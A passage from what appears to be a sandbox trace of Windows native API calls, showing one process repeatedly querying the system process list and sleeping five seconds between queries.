RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.782] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.786] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.791] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.800] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.801] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.817] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.824] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.835] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.843] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.844] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.855] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.864] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.903] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.904] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.912] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.917] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.920] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.920] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.927] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.935] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.937] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.943] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.946] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.961] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.971] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.979] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0276.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0276.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0276.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0276.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0276.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0276.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0276.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 